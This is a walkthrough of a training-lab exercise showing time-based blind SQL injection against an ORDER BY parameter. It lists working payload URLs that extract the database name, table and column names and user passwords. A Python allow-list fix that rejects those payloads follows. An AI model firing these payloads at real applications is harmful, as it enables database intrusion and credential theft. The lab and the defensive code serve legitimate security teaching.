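We open the target machine and select "SQL Injections".
Select "Example9".
Observe the page.
The blind injection method is as follows:
Nothing is echoed back in the response, so use time-based (delay) injection.
Injection point: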
http://192.168.1.142/sqli/example9.php?order=if(length(database())>9,sleep(10),1)%23
The payloads are:
http://192.168.1.142/sqli/example9.php?order=if(length(database())>9,sleep(10),1)%23
http://192.168.1.142/sqli/example9.php?order=if(ascii(substr(database(),1,1))>101,sleep(10),1)%23
http://192.168.1.142/sqli/example9.php?order=if(length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>4,sleep(10),1)%23
http://192.168.1.142/sqli/example9.php?order=if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>118,sleep(10),1)%23
http://192.168.1.142/sqli/example9.php?order=if(length((select column_name from information_schema.columns where table_name=unhex(7573657273) limit 1,1))>4,sleep(10),1)%23
http://192.168.1.142/sqli/example9.php?order=if(ascii(substr((select column_name from information_schema.columns where table_name=unhex(7573657273) limit 0,1),1,1))>105,sleep(10),1)%23
http://192.168.1.142/sqli/example9.php?order=if(length((select passwd from users limit 0,1))>5,sleep(10),1)%23
Examine the target's source code.
It uses a function to filter the SQL query.
You can refer to payloads available online.
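
A defensive counterpart to the payloads above, added here as an example and not taken from the target's source code: the payloads contain no quote characters (the table name is written as unhex(7573657273)), so the robust fix for a sort parameter is an allow-list rather than an escaping filter. The column names, the default sort, and the assumption that `order` is concatenated into an ORDER BY clause are illustrative.

```python
from urllib.parse import urlsplit, parse_qs

# Assumed for illustration: the sortable columns and the default sort.
ALLOWED_COLUMNS = {"id", "name", "age"}
ALLOWED_DIRECTIONS = {"ASC", "DESC"}
DEFAULT_CLAUSE = "ORDER BY `id` ASC"


def order_by_clause(url):
    """Build the ORDER BY clause for a request URL.

    Returns (clause, rejected). `rejected` is True when an `order` value was
    supplied but is not an allow-listed column, so the caller can log it.
    """
    values = parse_qs(urlsplit(url).query, keep_blank_values=True).get("order")
    if values is None:
        return DEFAULT_CLAUSE, False          # parameter absent: default sort
    if len(values) != 1:
        return DEFAULT_CLAUSE, True           # repeated parameter: refuse
    tokens = values[0].split()
    if not 1 <= len(tokens) <= 2:
        return DEFAULT_CLAUSE, True           # empty value or extra tokens
    column = tokens[0]
    direction = tokens[1].upper() if len(tokens) == 2 else "ASC"
    if column not in ALLOWED_COLUMNS or direction not in ALLOWED_DIRECTIONS:
        return DEFAULT_CLAUSE, True
    # Only fixed strings from the allow-lists reach the SQL text.
    return f"ORDER BY `{column}` {direction}", False


# Constructed sample requests: two benign sorts and two payloads from this page.
SAMPLE_URLS = [
    "http://192.168.1.142/sqli/example9.php?order=name",
    "http://192.168.1.142/sqli/example9.php?order=age%20desc",
    "http://192.168.1.142/sqli/example9.php?order=if(length(database())>9,sleep(10),1)%23",
    "http://192.168.1.142/sqli/example9.php?order=if(length((select passwd from users limit 0,1))>5,sleep(10),1)%23",
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        clause, rejected = order_by_clause(url)
        print("REJECTED" if rejected else "ok      ", clause, "<-", url)
```

Rejected values fall back to the default sort instead of returning an error, and the `rejected` flag gives the application a place to log the request for review.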